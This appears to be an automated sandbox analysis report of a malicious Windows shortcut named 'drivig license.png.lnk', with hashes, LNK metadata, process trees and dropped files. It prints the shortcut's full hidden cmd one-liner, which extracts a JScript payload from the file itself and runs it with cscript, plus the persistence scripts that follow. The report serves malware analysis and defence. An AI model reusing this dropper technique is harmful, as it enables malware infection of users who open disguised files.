| Field | Value |
|---|---|
| File name | drivig license.png.lnk |
| Full analysis | https://app.any.run/tasks/302f9c64-e7d9-4317-ba4b-d9c024adc300 |
| Verdict | Malicious activity |
| Analysis date | June 19, 2019, 08:10:28 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | |
| MIME | application/octet-stream |
| File info | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=2, Archive, ctime=Tue Feb 13 03:43:24 2018, mtime=Tue Feb 13 03:43:24 2018, atime=Tue Feb 13 03:43:24 2018, length=302592, window=hidenormalshowminimized |
| MD5 | DBD6C4CB1F9B090AEC34723000A602AF |
| SHA1 | 482533EB9A27E1F8D4BE5EAA5EF476571D9CA0E2 |
| SHA256 | A462A146D86F78C73364D646FFFB8EF8CDE68E1E11FAFC89BC7B862E9B48DE6B |
| SSDEEP | 24576:sZUvLfsyzKVKwOwFhj/40hIPr9dTJU27eTEl3:sZVyzRQt4fdTJl7uEl3 |
| .lnk | Windows Shortcut (100) |
|---|---|
| Flags | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString, TargetMetadata |
| FileAttributes | Archive |
| CreateDate | 2018:02:13 05:43:24+01:00 |
| AccessDate | 2018:02:13 05:43:24+01:00 |
| ModifyDate | 2018:02:13 05:43:24+01:00 |
| TargetFileSize | 302592 |
| IconIndex | 2 |
| RunWindow | Show Minimized No Activate |
| HotKey | (none) |
| TargetFileDOSName | cmd.exe |
| DriveType | Fixed Disk |
| VolumeLabel | - |
| LocalBasePath | C:\Windows\System32\cmd.exe |
| RelativePath | ..\..\..\Windows\System32\cmd.exe |
| CommandLineArguments | `/c path=%windir%\system32&&move "drivig license.png.lnk " "%tmp%\1.lnk"&forfiles /P "%tmp%" /M "driv*.lnk" /S /D 0 /C "%comspec% /c move @path %tmp%\1.lnk"&type "%tmp%\1.lnk"\|find "BC7D">"%tmp%\0.js"\|rd a\|\|cSCripT "%tmp%\0.js"` |
| IconFileName | %ProgramFiles%\Windows NT\Accessories\wordpad.exe |
| MachineID | win-11nvmud2d59 |
| FillAttributes | 0x07 |
| PopupFillAttributes | 0xf5 |
| ScreenBufferSize | 1 x 1 |
| WindowSize | 1 x 1 |
| WindowOrigin | 65532 x 65532 |
| FontSize | 8 x 12 |
| FontFamily | Modern |
| FontWeight | 400 |
| FontName | Terminal |
| CursorSize | 25 |
| FullScreen | No |
| QuickEdit | No |
| InsertMode | Yes |
| WindowOriginAuto | No |
| HistoryBufferSize | 50 |
| NumHistoryBuffers | 4 |
| RemoveHistoryDuplicates | No |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2556 | `"C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "drivig license.png.lnk " "C:\Users\admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"&type "C:\Users\admin\AppData\Local\Temp\1.lnk"\|find "BC7D">"C:\Users\admin\AppData\Local\Temp\0.js"\|rd a\|\|cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"` | C:\Windows\System32\cmd.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3472 | `forfiles /P "C:\Users\admin\AppData\Local\Temp" /M "driv*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\admin\AppData\Local\Temp\1.lnk"` | C:\Windows\system32\forfiles.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: ForFiles - Executes a command on selected files; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 4032 | `C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\admin\AppData\Local\Temp\1.lnk""` | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3808 | `find "BC7D"` | C:\Windows\system32\find.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Find String (grep) Utility; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2388 | `C:\Windows\system32\cmd.exe /S /D /c" rd a"` | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 2; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2896 | `cSCripT "C:\Users\admin\AppData\Local\Temp\0.js"` | C:\Windows\system32\cscript.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
| 2908 | `C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}` | C:\Windows\system32\DllHost.exe | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: COM Surrogate; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 292 | `"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js` | C:\Windows\System32\cscript.exe | — | cscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
| 2468 | `"C:\Windows\System32\cscript.exe" C:\Users\admin\AppData\Local\Temp\reportapi.js` | C:\Windows\System32\cscript.exe | — | cscript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Version: 5.8.7600.16385 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2896 | cscript.exe | C:\Users\admin\AppData\Local\Temp\drivig license.png | image | CAEF19A73A018864968FD0D28A9BD2B0 | 355EF09EE7A428A80E24F957A3C21680755FBD576EABD5C7F9B8DE688A92EBD8 |
| 292 | cscript.exe | C:\Users\admin\AppData\Local\Temp\reportapi.js | text | 615324F675BC8325A3E03EA30E237B10 | DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210 |
| 3808 | find.exe | C:\Users\admin\AppData\Local\Temp\0.js | text | 615324F675BC8325A3E03EA30E237B10 | DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210 |
| 2556 | cmd.exe | C:\Users\admin\AppData\Local\Temp\1.lnk | lnk | DBD6C4CB1F9B090AEC34723000A602AF | A462A146D86F78C73364D646FFFB8EF8CDE68E1E11FAFC89BC7B862E9B48DE6B |
| 2896 | cscript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Credentials\MediaPlayer\MediaManager\media.js | text | 615324F675BC8325A3E03EA30E237B10 | DEA6225507902F36DAA1119E9ADD68EAAADAEC867B67218B432051C1EBFF8210 |